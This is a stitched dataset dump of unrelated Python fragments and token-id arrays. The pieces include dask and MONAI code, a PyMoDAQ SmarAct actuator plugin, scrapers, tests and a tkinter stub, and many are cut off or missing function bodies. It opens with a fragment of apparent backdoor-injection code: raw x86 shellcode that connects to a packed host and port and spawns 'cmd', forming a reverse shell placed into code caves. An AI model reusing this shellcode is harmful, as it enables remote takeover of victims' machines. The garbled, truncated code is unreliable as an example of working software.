"\x68\x65\x63\x74\x00\x68\x63\x6F\x6E\x6E\x54\x57\xFF\x16\x87\xCD"
"\x95\x6A\x05\x68")
self.shellcode1 += self.pack_ip_addresses() # HOST
self.shellcode1 += "\x68\x02\x00"
self.shellcode1 += struct.pack('!H', self.PORT) # PORT
self.shellcode1 += ("\x89\xE2\x6A"
"\x10\x52\x51\x87\xF9\xFF\xD5"
)
#breakupvar is the distance between codecaves
breakupvar = eat_code_caves(flItms, 0, 1)
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9" # JMP opcode
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
self.shellcode2 = ("\x85\xC0\x74\x00\x6A\x00\x68\x65\x6C"
"\x33\x32\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x73\x41\x00\x00\x68"
"\x6F\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\x50"
"\xFF\x16\x95\x93\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x87\xFE"
"\x92\x31\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01"
"\x8D\x44\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56"
"\x56\x53\x56\x87\xDA\xFF\xD5\x89\xE6\x6A\x00\x68\x65\x6C\x33\x32"
"\x68\x6B\x65\x72\x6E\x54\xFF\x13\x68\x65\x63\x74\x00\x68\x65\x4F"
"\x62\x6A\x68\x69\x6E\x67\x6C\x68\x46\x6F\x72\x53\x68\x57\x61\x69"
"\x74\x54\x50\x95\xFF\x17\x95\x89\xF2\x31\xF6\x4E\x56\x46\x89\xD4"
"\xFF\x32\x96\xFF\xD5\x81\xC4\x34\x02\x00\x00"
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
| [
7061,
6,
198,
198,
15269,
357,
66,
8,
2211,
12,
4626,
11,
20700,
10276,
82,
198,
3237,
2489,
10395,
13,
198,
198,
7738,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
17613,
11,
198,
533,
10431,
2810,
326,
2... | 1.536617 | 22,066 |
# Copyright 2020 - 2021 MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import numpy as np
import torch
from ignite.engine import Engine
from monai.data import CacheDataset, DataLoader, create_test_image_3d, pad_list_data_collate
from monai.engines.utils import IterationEvents
from monai.handlers import TransformInverter
from monai.transforms import (
AddChanneld,
CastToTyped,
Compose,
LoadImaged,
Orientationd,
RandAffined,
RandAxisFlipd,
RandFlipd,
RandRotate90d,
RandRotated,
RandZoomd,
ResizeWithPadOrCropd,
ScaleIntensityd,
Spacingd,
ToTensord,
)
from monai.utils.misc import set_determinism
from tests.utils import make_nifti_image
# Dictionary keys addressed by the dict-based transforms composed in this
# test module.
KEYS = ["image", "label"]
# Allow running this test module directly as a script.
if __name__ == "__main__":
    unittest.main()
| [
2,
15069,
12131,
532,
33448,
25000,
20185,
42727,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
351,
262,
13789,
13,
198,
2,
921... | 3.020642 | 436 |
import functools
import pydoc
from collections import defaultdict
from functools import partial
from typing import Any, List, MutableMapping
import dask
from dask.utils import Dispatch
from .proxy_object import ProxyObject, asproxy
dispatch = Dispatch(name="proxify_device_objects")
ignore_types = None
def _register_ignore_types():
    """Lazy register types that shouldn't be proxified

    It reads the config key "jit-unspill-ignore" (DASK_JIT_UNSPILL_IGNORE),
    which should be a comma seperated list of types to ignore. The default
    value is:
        DASK_JIT_UNSPILL_IGNORE="cupy.ndarray"

    Notice, it is not possible to ignore types explicitly handled by this
    module such as `cudf.DataFrame`, `cudf.Series`, and `cudf.Index`.
    """
    global ignore_types
    if ignore_types is not None:
        return  # Only register once
    else:
        # Sentinel: marks registration as done even when nothing is ignored.
        ignore_types = ()
    ignores = dask.config.get("jit-unspill-ignore", "cupy.ndarray")
    ignores = ignores.split(",")
    # Group the dotted type paths by their top-level module name so that
    # registration can be deferred until that module is actually imported.
    toplevels = defaultdict(set)
    for path in ignores:
        if path:
            toplevel = path.split(".", maxsplit=1)[0].strip()
            toplevels[toplevel].add(path.strip())
    # NOTE(review): `f` is not defined anywhere in this fragment, and the
    # loop variable `ignores` shadows the list built above -- presumably the
    # lazy-registration helper was lost when this file was excerpted.
    # Confirm against the upstream module before relying on this function.
    for toplevel, ignores in toplevels.items():
        dispatch.register_lazy(toplevel, partial(f, ignores))
def proxify_device_objects(
    obj: Any,
    proxied_id_to_proxy: MutableMapping[int, ProxyObject] = None,
    found_proxies: List[ProxyObject] = None,
    excl_proxies: bool = False,
    mark_as_explicit_proxies: bool = False,
):
    """Wrap every CUDA device object found in ``obj`` in a ProxyObject.

    The traversal itself is delegated to the ``dispatch`` table; identical
    device objects are mapped to a single proxy via ``proxied_id_to_proxy``.

    Parameters
    ----------
    obj: Any
        Object to search through or wrap in a ProxyObject.
    proxied_id_to_proxy: MutableMapping[int, ProxyObject]
        Maps the id() of already-proxied device objects to their proxy and
        is updated in place with any new proxies found in ``obj``.
        An empty dict is used when None.
    found_proxies: List[ProxyObject]
        Collects every proxy encountered, including ones already present in
        ``proxied_id_to_proxy``.  An empty list is used when None.
    excl_proxies: bool
        When True, objects that are already ProxyObject are not added to
        ``found_proxies``.
    mark_as_explicit_proxies: bool
        When True, every collected proxy is flagged as "explicit", meaning
        the user allows it as a dask task argument even in
        compatibility-mode.

    Returns
    -------
    ret: Any
        A copy of ``obj`` with all CUDA device objects wrapped in
        ProxyObject.
    """
    _register_ignore_types()
    proxied_id_to_proxy = {} if proxied_id_to_proxy is None else proxied_id_to_proxy
    found_proxies = [] if found_proxies is None else found_proxies
    wrapped = dispatch(obj, proxied_id_to_proxy, found_proxies, excl_proxies)
    if mark_as_explicit_proxies:
        for proxy in found_proxies:
            proxy._pxy_get().explicit_proxy = True
    return wrapped
def unproxify_device_objects(obj: Any, skip_explicit_proxies: bool = False):
    """Recursively un-wrap all ProxyObject instances found in ``obj``.

    Dicts and the standard container types are rebuilt with their elements
    unproxified; any other object is returned unchanged.

    Parameters
    ----------
    obj: Any
        Object to search through or unproxify.
    skip_explicit_proxies: bool
        When True, proxies flagged as explicit are left wrapped.

    Returns
    -------
    ret: Any
        A copy of ``obj`` with all (eligible) CUDA device objects
        unproxified.
    """
    if isinstance(obj, dict):
        return {
            key: unproxify_device_objects(value, skip_explicit_proxies)
            for key, value in obj.items()
        }
    if isinstance(obj, (list, tuple, set, frozenset)):
        rebuild = type(obj)
        return rebuild(
            unproxify_device_objects(item, skip_explicit_proxies) for item in obj
        )
    if isinstance(obj, ProxyObject):
        detail = obj._pxy_get(copy=True)
        # De Morgan of the original guard: deserialize unless this proxy is
        # explicit AND explicit proxies are being skipped.
        if not (skip_explicit_proxies and detail.explicit_proxy):
            detail.explicit_proxy = False
            obj = obj._pxy_deserialize(maybe_evict=False, proxy_detail=detail)
    return obj
def proxify_decorator(func):
    """Returns a function wrapper that explicit proxify the output

    Notice, this function only has effect in compatibility mode.
    """
    @functools.wraps(func)
    # NOTE(review): the inner ``def wrapper(...)`` is missing here --
    # ``wrapper`` is returned but never defined, and a decorator cannot
    # precede a ``return`` statement.  Lines were presumably lost when this
    # file was excerpted; restore the wrapper body from the upstream module.
    return wrapper
def unproxify_decorator(func):
    """Returns a function wrapper that unproxify output

    Notice, this function only has effect in compatibility mode.
    """
    @functools.wraps(func)
    # NOTE(review): same truncation as ``proxify_decorator`` above -- the
    # inner ``def wrapper(...)`` body is missing from this fragment;
    # restore it from the upstream module.
    return wrapper
@dispatch.register(object)
@dispatch.register(ProxyObject)
@dispatch.register(list)
@dispatch.register(tuple)
@dispatch.register(set)
@dispatch.register(frozenset)
@dispatch.register(dict)
# Implement cuDF specific proxification
@dispatch.register_lazy("cudf")
| [
11748,
1257,
310,
10141,
198,
11748,
279,
5173,
420,
198,
6738,
17268,
1330,
4277,
11600,
198,
6738,
1257,
310,
10141,
1330,
13027,
198,
6738,
19720,
1330,
4377,
11,
7343,
11,
13859,
540,
44,
5912,
198,
198,
11748,
288,
2093,
198,
6738,... | 2.625737 | 1,865 |
import pytest
from contacts.models import Contacts
from django.urls import reverse
@pytest.mark.django_db | [
11748,
12972,
9288,
198,
6738,
13961,
13,
27530,
1330,
2345,
8656,
198,
6738,
42625,
14208,
13,
6371,
82,
1330,
9575,
198,
198,
31,
9078,
9288,
13,
4102,
13,
28241,
14208,
62,
9945
] | 3.3125 | 32 |
import argparse
# Command-line options for a retrieval + reading-comprehension evaluation
# run: retriever settings (sparse BM25 or a dense DPR-style encoder over a
# prebuilt index), reader model settings, and output/runtime options.
parser = argparse.ArgumentParser()
# --- runtime / data ---
parser.add_argument(
    "--device",
    default="cpu",
    type=str,
    help="Device to run query encoder, cpu or [cuda:0, cuda:1, ...]",
)
parser.add_argument(
    "--dataset_path",
    default=None,
    type=str,
    help="Path to the [dev, test] dataset",
)
# --- retriever configuration ---
parser.add_argument(
    "--retriever",
    default="bm25",
    type=str,
    help="define the indexer type",
)
# k1 and b are the standard BM25 term-saturation / length-normalization
# parameters; used only when --retriever selects bm25.
parser.add_argument(
    "--k1",
    default=0.9,
    type=float,
    help="k1, parameter for bm25 retriever",
)
parser.add_argument(
    "--b",
    default=0.4,
    type=float,
    help="b, parameter for bm25 retriever",
)
parser.add_argument(
    "--encoder",
    default="facebook/dpr-question_encoder-multiset-base",
    type=str,
    help="dpr encoder path or name",
)
parser.add_argument(
    "--query_tokenizer_name",
    default=None,
    type=str,
    help="tokenizer for dpr encoder",
)
parser.add_argument(
    "--index_path",
    default=None,
    type=str,
    help="Path to the indexes of contexts",
)
# NOTE(review): "sarse" in the help text below is presumably a typo for
# "sparse" -- left unchanged here because help text is runtime output.
parser.add_argument(
    "--sparse_index",
    default=None,
    type=str,
    help="Path to the indexes of sarse tokenizer, required when using dense index, in order to retrieve the raw document",
)
# --- reader (answer extraction) model ---
parser.add_argument(
    "--model_name_or_path",
    default=None,
    type=str,
    help="Path to pretrained model or model identifier from huggingface.co/models",
)
parser.add_argument(
    "--tokenizer_name",
    default=None,
    type=str,
    help="Pretrained tokenizer name or path if not the same as model_name",
)
# --- outputs ---
parser.add_argument(
    "--output",
    default=None,
    type=str,
    help="The output file where the runs results will be written to",
)
parser.add_argument(
    "--output_nbest_file",
    default=None,
    type=str,
    help="The output file for store nbest results temporarily",
)
# --- evaluation options ---
parser.add_argument(
    "--language",
    default="en",
    type=str,
    help="The language of task",
)
parser.add_argument(
    "--eval_batch_size",
    default=32,
    type=int,
    help="batch size for evaluation",
)
parser.add_argument(
    "--topk",
    default=10,
    type=int,
    help="The number of contexts retrieved for a question",
)
parser.add_argument(
    "--support_no_answer",
    action="store_true",
    help="support no answer prediction",
)
# NOTE(review): help text likely means "strip accents" rather than
# "script accents"; left unchanged (runtime output).
parser.add_argument(
    "--strip_accents",
    action="store_true",
    help="script accents for questions",
)
# Parse sys.argv; `args` is consumed by the code that follows this excerpt.
args = parser.parse_args()
11748,
1822,
29572,
198,
198,
48610,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
198,
48610,
13,
2860,
62,
49140,
7,
198,
220,
220,
220,
366,
438,
25202,
1600,
198,
220,
220,
220,
4277,
2625,
36166,
1600,
198,
220,
220,
220,
... | 2.535604 | 969 |
"""
"Hello world" example
for solving an SLE (system of linear equations)
with FuncDesigner.
"""
from FuncDesigner import *
# create some named symbolic variables
a, b, c = oovars('a', 'b', 'c')
# or just a, b, c = oovars(3)
# Python list of 3 linear equations with 3 variables;
# presumably each expression is treated as "expression == 0"
# (see the explicit-equation alternative below).
f = [2*a+3*b-2*c+5, 2*a+13*b+15, a+4*b+2*c-45]
# alternatively, you could pass equations:
#f = [2*a+3*b-2*c==-5, 2*a+15==-13*b, a==-4*b-2*c+45]
# assemble the system of linear equations
linSys = sle(f)
# solve the system and read back the value of each variable
r = linSys.solve()
A, B, C = r(a, b, c)
maxRes = r.ff # max residual of the solution
print(A, B, C, maxRes)
# Expected result:
# (array([ 25.]), array([-5.]), array([ 20.]), 7.1054273576010019e-15)
| [
37811,
198,
1,
15496,
995,
1,
1672,
220,
198,
1640,
18120,
311,
2538,
357,
10057,
286,
14174,
27490,
8,
198,
37811,
198,
6738,
11138,
66,
23067,
263,
1330,
1635,
198,
198,
2,
2251,
617,
9633,
198,
64,
11,
275,
11,
269,
796,
267,
7... | 2.181159 | 276 |
from abc import abstractmethod
from candy_editor.core import EditorModule
from candy_editor.qt.controls.Menu import MenuManager
from candy_editor.qt.controls.ToolBar import ToolBarManager, ToolBarItem
from PyQt5 import QtGui, QtWidgets
from PyQt5.QtCore import Qt
##----------------------------------------------------------------##
# Name of the INI file used to persist Qt UI settings; NOTE(review): how this
# relative path is resolved is not visible in this fragment -- confirm where
# the editor anchors it (working directory vs. a config directory).
_QT_SETTING_FILE = 'qt.ini'
##----------------------------------------------------------------##
| [
6738,
450,
66,
1330,
12531,
24396,
198,
198,
6738,
18550,
62,
35352,
13,
7295,
1330,
12058,
26796,
198,
6738,
18550,
62,
35352,
13,
39568,
13,
13716,
82,
13,
23381,
1330,
21860,
13511,
198,
6738,
18550,
62,
35352,
13,
39568,
13,
13716,
... | 4.065421 | 107 |
from pymodaq.daq_move.utility_classes import DAQ_Move_base
from pymodaq.daq_move.utility_classes import comon_parameters
from pymodaq.daq_utils.daq_utils import ThreadCommand
from easydict import EasyDict as edict
from ..hardware.smaract.smaract import SmarAct
from ..hardware.smaract.smaract import get_controller_locators
class DAQ_Move_SmarActMCS(DAQ_Move_base):
    """
    This plugin supports only SmarAct LINEAR positionners (SLC type), with
    enabled sensors attached to them.
    We suppose to have one (or multiple) MCS controllers connected. With 3
    channels (each).
    We suppose that the configuration of the controllers (sensor type etc) has
    been done via the SmarAct MCS Configuration software.
    Tested with one SLC-1740-S (closed loop with nanometer precision sensor)
    connected via a MCS-3S-EP-SDS15-TAB (sensor module) to a MCS-3D (or MCS-3C)
    controller on Windows 7.
    """
    # User-facing unit; the hardware itself talks in nanometers (the
    # conversion is done in check_position/move_Abs/move_Rel below).
    _controller_units = "µm"
    # find controller locators (identifiers of the connected MCS controllers)
    controller_locators = get_controller_locators()
    is_multiaxes = True
    # we suppose to have a MCS controller with 3 channels (like the MCS-3D).
    stage_names = [0, 1, 2]
    # bounds corresponding to the SLC-24180
    min_bound = -61500  # µm
    max_bound = +61500  # µm
    offset = 0  # µm
    # Settings tree shown in the PyMoDAQ GUI for this actuator.
    params = [
        {
            "title": "group parameter:",
            "name": "group_parameter",
            "type": "group",
            "children": [
                {
                    "title": "Controller Name:",
                    "name": "smaract_mcs",
                    "type": "str",
                    "value": "SmarAct MCS controller",
                    "readonly": True,
                },
                {
                    "title": "Controller locator",
                    "name": "controller_locator",
                    "type": "list",
                    "values": controller_locators,
                },
            ],
        },
        ##########################################################
        # the ones below should ALWAYS be present!!!
        {
            "title": "MultiAxes:",
            "name": "multiaxes",
            "type": "group",
            "visible": is_multiaxes,
            "children": [
                {
                    "title": "is Multiaxes:",
                    "name": "ismultiaxes",
                    "type": "bool",
                    "value": is_multiaxes,
                    "default": False,
                },
                {
                    "title": "Status:",
                    "name": "multi_status",
                    "type": "list",
                    "value": "Master",
                    "values": ["Master", "Slave"],
                },
                {
                    "title": "Axis:",
                    "name": "axis",
                    "type": "list",
                    "values": stage_names,
                },
            ],
        },
    ] + comon_parameters
    ##########################################################
    def ini_stage(self, controller=None):
        """Initialize the controller and stages (axes) with given parameters.
        Parameters
        ----------
        controller (object): custom object of a PyMoDAQ plugin (Slave case).
            None if only one actuator by controller (Master case)
        Returns
        -------
        self.status: (edict) with initialization status: three fields:
            * info: (str)
            * controller: (object) initialized controller
            * initialized: (bool) False if initialization failed otherwise
                True
        """
        try:
            # initialize the stage and its controller status
            # controller is an object that may be passed to other instances of
            # DAQ_Move_Mock in case of one controller controlling
            # multiactuators (or detector)
            self.status.update(edict(
                info="", controller=None, initialized=False))
            # check whether this stage is controlled by a multiaxe controller
            # (to be defined for each plugin)
            # if multiaxes then init the controller here if Master state
            # otherwise use external controller
            if self.settings.child('multiaxes',
                                   'ismultiaxes').value() \
                    and self.settings.child('multiaxes',
                                            'multi_status').value() == "Slave":
                if controller is None:
                    raise Exception('No controller has been defined externally'
                                    ' while this axe is a slave one')
                else:
                    self.controller = controller
            else:  # Master stage
                self.controller = SmarAct()
                self.controller.init_communication(
                    self.settings.child("group_parameter",
                                        "controller_locator").value()
                )
            # min and max bounds will depend on which positionner is plugged.
            # Anyway the bounds are secured by the library functions.
            self.settings.child("bounds", "is_bounds").setValue(True)
            self.settings.child("bounds", "min_bound").setValue(self.min_bound)
            self.settings.child("bounds", "max_bound").setValue(self.max_bound)
            # Scaling (offset in µm) is mandatory for this plugin.
            self.settings.child("scaling", "use_scaling").setValue(True)
            self.settings.child("scaling", "offset").setValue(self.offset)
            self.status.controller = self.controller
            self.status.initialized = True
            return self.status
        except Exception as e:
            # Report the failure to the GUI log and flag the init as failed.
            self.emit_status(ThreadCommand("Update_Status", [str(e), "log"]))
            self.status.info = str(e)
            self.status.initialized = False
            return self.status
    def close(self):
        """Close the communication with the SmarAct controller.
        """
        self.controller.close_communication()
        # Drop the reference so a stale controller cannot be reused.
        self.controller = None
    def check_position(self):
        """Get the current position from the hardware with scaling conversion.
        Returns
        -------
        float: The position obtained after scaling conversion.
        """
        position = self.controller.get_position(
            self.settings.child("multiaxes", "axis").value()
        )
        # the position given by the controller is in nanometers, we convert in
        # micrometers
        position = float(position) / 1e3
        # convert position if scaling options have been used, mandatory here
        position = self.get_position_with_scaling(position)
        self.current_position = position
        # Notify the GUI of the freshly read position.
        self.emit_status(ThreadCommand("check_position", [position]))
        return position
    def move_Abs(self, position):
        """Move to an absolute position
        Parameters
        ----------
        position: float
            Target position in µm (user units, before scaling).
        """
        # limit position if bounds options has been selected and if position is
        # out of them
        position = self.check_bound(position)
        self.target_position = position
        # convert the user set position to the controller position if scaling
        # has been activated by user
        position = self.set_position_with_scaling(position)
        # we convert position in nm
        position = int(position * 1e3)
        # the SmarAct controller asks for nanometers
        self.controller.absolute_move(
            self.settings.child("multiaxes", "axis").value(), position
        )
        # start polling the position until the actuator reach the target
        # position within epsilon
        # defined as a parameter field (comon_parameters)
        self.poll_moving()
    def move_Rel(self, position):
        """Move to a relative position
        Parameters
        ----------
        position: float
            Requested displacement in µm (user units, before scaling).
        """
        # limit position if bounds options has been selected and if position is
        # out of them; the clipped value is re-expressed as a displacement
        position = (
            self.check_bound(self.current_position + position)
            - self.current_position)
        self.target_position = position + self.current_position
        # convert the user set position to the controller position if scaling
        # has been activated by user
        position = self.set_position_with_scaling(position)
        # we convert position in nm
        position = int(position * 1e3)
        # the SmarAct controller asks for nanometers
        self.controller.relative_move(
            self.settings.child("multiaxes", "axis").value(), position
        )
        self.poll_moving()
    def move_Home(self):
        """Move to home and reset position to zero.
        """
        # NOTE(review): only find_reference is called here; the position reset
        # is presumably handled by the controller itself — confirm.
        self.controller.find_reference(
            self.settings.child("multiaxes", "axis").value())
    def stop_motion(self):
        """Stop the motion of the selected axis and signal completion.
        See Also
        --------
        DAQ_Move_base.move_done
        """
        self.controller.stop(self.settings.child("multiaxes", "axis").value())
        self.move_done()
if __name__ == "__main__":
    # Manual smoke test: instantiate the plugin outside of the PyMoDAQ
    # dashboard (presumably no hardware access before ini_stage — confirm).
    test = DAQ_Move_SmarActMCS()
| [
6738,
12972,
4666,
30188,
13,
48539,
62,
21084,
13,
315,
879,
62,
37724,
1330,
17051,
48,
62,
21774,
62,
8692,
198,
6738,
12972,
4666,
30188,
13,
48539,
62,
21084,
13,
315,
879,
62,
37724,
1330,
401,
261,
62,
17143,
7307,
198,
6738,
... | 2.221441 | 4,123 |
from transformers import AutoTokenizer, AutoModel
import random
import torch
import torch.nn.functional as F
from tqdm import tqdm
import re
from typing import Optional, Callable
# Returns the index of the masked token after applying the model's tokenizer.
| [
6738,
6121,
364,
1330,
11160,
30642,
7509,
11,
11160,
17633,
198,
11748,
4738,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
13,
45124,
355,
376,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
302,
198,
198,
6738,
19720... | 3.910448 | 67 |
# mlf_to_csv.py
# grabs mlf alignment files from the data/mlfs directory and creates one csv
# per transcript in the data/csvs directory
from subprocess import call
import csv
import re

# One mlf row looks like "<start> <end> <phone> <score> [<word>]".
# Group 1 is the phone, group 2 the score; a non-empty group 3 (<word>)
# marks the beginning of a new word. Compiled once instead of per transcript.
ROW_PATTERN = re.compile(r'\d*\s\d*\s(.*)\s(\d*\.\d*)\s?(\w*)')

NUM_TRANSCRIPTS = 4


def read_names(path):
    """Return the speaker names listed in *path*, one name per line."""
    with open(path) as name_file:
        return [line.strip() for line in name_file]


def write_transcript_csv(csv_filename, speakers, mlf_dir, transcript_no):
    """Convert one transcript's mlf alignments into a single csv.

    csv_filename  -- output csv path
    mlf_dir       -- subdirectory of data/mlfs ('native' or 'foreign')
    transcript_no -- 1-based transcript number used in the mlf file names

    One section per speaker is written: a blank separator row, a
    ('person', <name>) header, then one row per word holding the word
    followed by alternating phone/score columns.
    """
    # 'wb' is the Python 2 csv convention this script was written for.
    with open(csv_filename, 'wb') as csv_file:
        csv_writer = csv.writer(csv_file, delimiter=',')
        for speaker in speakers:
            csv_writer.writerow('')
            row_string = ['person', '%s' % speaker]
            filename = 'data/mlfs/%s/%s_%d.mlf' % (mlf_dir, speaker,
                                                   transcript_no)
            try:
                mlf_file = open(filename)
            except IOError:
                # A missing alignment file is expected for some speakers:
                # warn and move on instead of aborting the whole run.
                print("missing filename: " + filename)
                continue
            try:
                mlf_data = mlf_file.readlines()
            finally:
                mlf_file.close()
            for row in mlf_data:
                m = ROW_PATTERN.match(row)
                if m:
                    if m.group(3):
                        # A new word starts: flush the accumulated row.
                        csv_writer.writerow(row_string)
                        row_string = [m.group(3)]
                    row_string.append(m.group(1))
                    row_string.append(m.group(2))
            csv_writer.writerow(row_string)


def main():
    natives = read_names('data/FWOA.txt')
    foreigners = read_names('data/FWA.txt')
    for i in range(NUM_TRANSCRIPTS):
        write_transcript_csv('data/csvs/transcript_%d.csv' % (i + 1),
                             natives, 'native', i + 1)
    for i in range(NUM_TRANSCRIPTS):
        write_transcript_csv(
            'data/csvs/transcript_foreigner_%d.csv' % (i + 1),
            foreigners, 'foreign', i + 1)


if __name__ == '__main__':
    main()
| [
2,
285,
1652,
62,
1462,
62,
40664,
13,
9078,
198,
2,
22378,
285,
1652,
422,
262,
1366,
14,
76,
1652,
82,
8619,
290,
8075,
257,
269,
21370,
287,
220,
198,
2,
287,
262,
1366,
14,
6359,
14259,
8619,
351,
262,
3128,
198,
198,
6738,
... | 2.265945 | 831 |
import subprocess
from sys import stderr
from typing import Any, Dict, List
from pathlib import Path
import mimetypes
import os
import json
from sphinx.builders.dirhtml import DirectoryHTMLBuilder
from sphinx.builders.html import StandaloneHTMLBuilder
from sphinx.builders.linkcheck import CheckExternalLinksBuilder
from sphinx.application import Sphinx
from sphinx.errors import ConfigError
from docutils import nodes
from urllib.parse import urljoin
from sphinx.util import logging
# Module-level logger, named after the module for hierarchical filtering.
logger = logging.getLogger(__name__)
# Sphinx builder names used by Read the Docs builds (presumably the builders
# this extension targets — confirm against the registration code).
READTHEDOCS_BUILDERS = ["readthedocs", "readthedocsdirhtml"]
# verify workbox exists or is installed
# if it is not, install it
| [
11748,
850,
14681,
201,
198,
6738,
25064,
1330,
336,
1082,
81,
201,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
11,
7343,
201,
198,
6738,
3108,
8019,
1330,
10644,
201,
198,
11748,
17007,
2963,
12272,
201,
198,
11748,
28686,
201,
198,
... | 3.053097 | 226 |
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Create a CSV with each race since 1990, with the rid and the Wikidata qid.
"""
import os
import requests
from bs4 import BeautifulSoup
import re
import csv

# Race names in the order their result links appear within a year's table row.
RACE_NAMES = ('FL1000', 'FL500', 'FL Junior')
# Extracts the race id from the javascript link "openRaceWnd('<rid>')".
# Compiled once instead of being rebuilt for every table row.
RID_PATTERN = re.compile(r"openRaceWnd\('(?P<id>[0-9]*)'\)")

# Map "<year> <race name>" -> Wikidata qid, loaded from the temp csv
# (columns: qid, race name).
race_qids = {}
root_dir = os.environ['HOME'] + "/Dropbox/finnmarkslopet/"
with open(root_dir + 'finnmarkslopet-qid-temp.csv', 'r') as csv_in:
    reader = csv.reader(csv_in)
    for row in reader:
        race_qids[row[1]] = row[0]
# (the 'with' block closes the file; the old no-op "csv_in.closed" is gone)

# Fetch the results index page: one table row per year, one link per race.
root_url = 'http://www.finnmarkslopet.no'
index_url = root_url + '/rhist/results.jsp?lang=en'
response = requests.get(index_url)
# Explicit parser avoids bs4's "no parser specified" warning and keeps the
# result stable across installations.
soup = BeautifulSoup(response.text, 'html.parser')
table = soup.select('.winners tr')
table.pop(0)  # first row is the table header

with open(root_dir + 'finnmarkslopet-qid.csv', 'w') as csv_out:
    fieldnames = ["race", "rid", "qid"]
    writer = csv.DictWriter(csv_out, fieldnames=fieldnames)
    writer.writeheader()
    for row in table:
        year = row.strong.string
        links = row.find_all("a")
        # A year carries one to three links (FL1000, then optionally FL500
        # and FL Junior); zip stops at the shorter sequence, which replaces
        # the three near-identical writerow blocks of the original.
        for race_name, link in zip(RACE_NAMES, links):
            race = year + ' ' + race_name
            writer.writerow({
                'race': race,
                'rid': RID_PATTERN.search(link.get('href')).group("id"),
                'qid': race_qids[race],
            })
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
41002,
12,
23,
532,
9,
12,
198,
198,
37811,
198,
16447,
257,
44189,
351,
1123,
3234,
1201,
6303,
11,
351,
262,
5755,
290,
262,
11145,
312,
1045,
10662... | 2.286776 | 673 |
import unittest
from zeppos_mail.email import Email
if __name__ == '__main__':
    # Discover and run this module's unittest test cases.
    unittest.main()
| [
11748,
555,
715,
395,
198,
6738,
41271,
381,
418,
62,
4529,
13,
12888,
1330,
9570,
628,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
555,
715,
395,
13,
12417,
3419,
198
] | 2.615385 | 39 |
from __future__ import absolute_import
from __future__ import unicode_literals
from testinfra.utils.ansible_runner import AnsibleRunner
import os
import pytest
import logging
import testinfra.utils.ansible_runner
import collections
# Verbose logging makes Molecule/Testinfra failures easier to diagnose.
logging.basicConfig(level=logging.DEBUG)
# # DEFAULT_HOST = 'all'
# Role variables file, relative to the molecule scenario directory.
VAR_FILE = "../../vars/main.yml"
# Run the tests against every host of the Molecule-generated inventory.
TESTINFRA_HOSTS = testinfra.utils.ansible_runner.AnsibleRunner(
    os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('all')
inventory = os.environ['MOLECULE_INVENTORY_FILE']
# Runner instance — presumably used by the fixtures defined below; confirm.
runner = AnsibleRunner(inventory)
# runner.get_hosts(DEFAULT_HOST)
@pytest.fixture()
@pytest.fixture
@pytest.fixture
# def test_sudo_from_root(host, ansible_variables):
# dict_variables = converttostr(ansible_variables)
# myuser = dict_variables['system_username']
# assert host.user().name == "root"
# with host.sudo(myuser):
# assert host.user().name == myuser
# assert host.user().name == "root"
# def test_sudo_fail_from_root(host, ansible_variables):
# dict_variables = converttostr(ansible_variables)
# myuser = dict_variables['system_username']
# #assert host.user().name == "root"
# with pytest.raises(AssertionError) as exc:
# with host.sudo(myuser):
# assert host.user(myuser).name == myuser
# host.check_output('ls /root/invalid')
# assert str(exc.value).startswith('Unexpected exit code')
# #with host.sudo():
# # assert host.user().name == "root"
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
28000,
1098,
62,
17201,
874,
198,
6738,
1332,
10745,
430,
13,
26791,
13,
504,
856,
62,
16737,
1330,
28038,
856,
49493,
198,
11748,
28686,
198,
11748,
12... | 2.503378 | 592 |
from distutils import command
from tkinter import *
import time
import Validacion
import Datos
import os
import shutil
from tkinter import messagebox
from tkinter import ttk
from tkinter.filedialog import askopenfilename
from tkinter import filedialog
from distutils import command
import shutil
from tkinter import messagebox
from tkinter import ttk
from tkinter.filedialog import askopenfilename
from tkinter import Label,Tk
from PIL import Image, ImageTk
from tkinter import filedialog
# Validation helper instance (module-level, presumably used by the form
# callbacks defined elsewhere in this file — confirm).
objeto_validacion=Validacion.validacion()
# NOTE(review): 'global' at module scope is a no-op; kept unchanged.
global lista_de_textbox
lista_de_textbox = list()
# IMAGE SELECTION
fecha=str(time.strftime("%d/%m/%y"))  # today's date as dd/mm/yy
# CENTER WINDOW
def center(win):
